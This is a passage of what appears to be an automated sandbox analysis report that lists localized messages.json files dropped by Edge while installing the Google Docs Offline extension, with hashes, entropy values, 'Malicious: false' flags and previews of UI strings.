Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
